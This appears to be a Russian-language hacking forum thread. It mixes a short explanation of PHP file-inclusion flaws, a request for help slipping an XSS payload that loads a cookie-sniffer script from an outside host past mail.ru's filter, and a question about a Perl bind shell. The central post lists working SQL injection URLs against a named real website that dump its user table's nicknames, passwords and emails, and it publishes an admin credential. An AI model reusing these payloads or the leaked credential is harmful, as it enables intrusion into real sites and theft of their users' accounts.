Может перед тем,как становиться крутым хакером, стоит почитать о том как работают те или иные ЯП? И вообще в целом о http и интернете.Тогда такие вопросы пропадут сами собой.
php-include При таком коде include($_GET['page']); php инклудит файл с именем page в папке со скриптом(можно выйти из границ папки напр. ?page=../../file.php). Соответственно, исполняется php-код и возвращается результат на страницу. читалка файлов Чтобы увидеть php-код на странице, нужно искать другие реализации кода, направленные именно на чтение файла (напр. file(), fopen+fgets, идр.) + должен быть вывод на страницу.
Здраствуйте можете помочь.Как обойти фильтр на mail.ru(он вроде заменяет точку и пробел на нижнее подчёркивание)Как должна выглядить этот скрипт %3CSCRIPT_type=text/javascript_src=http://httpz.ru/sniffer.js></SCRIPT>"
Пытался пробиндить машину,залил бинд, дал команду perl bind.pl . И ужеминут 15 никакого результата, просто грузится и все. Что с этим делать? Linux 2.6
эмм..а что там не так? сайт ясно говорит - что логин\пассвор инкорект.Невижу уязвимости,хоть глаз выколи. А вот если так,то уже кое что есть,раскрытия путей. Code: http://logos.sakh.com/auth.php?name[]=%27&passw[]=%27 А вот и скуля Code: http://logos.sakh.com/?view=comments%27+union+select+version%28%29,2,3+--+ Code: http://logos.sakh.com/?view=comments%27+union+select+COLUMN_NAME,2,3+FROM%20INFORMATION_SCHEMA.COLUMNS%20WHERE%20TABLE_NAME=%27logos_users%27%20+limit+2,1+--+ Version: 5.0.82sp1-log Админка: Z:jncjcb Ничего интересного Даже обидно( Code: http://logos.sakh.com/?view=comments%27+union+select+concat_ws%280x3a,nick,password,email%29,2,3+FROM%20logos_users+--+ Имей лимитом,если хочеш других пльзователей.привилегий на загрузку шела нет,а жаль.Хотя из админкиможно файлы править но там чтото недописано,и поэтому не получаеться)
Эм, нам откуда знать, упадёт он или нет? Смотря сколько человек посмотрит картинку на форуме и какой сервер у сайта.
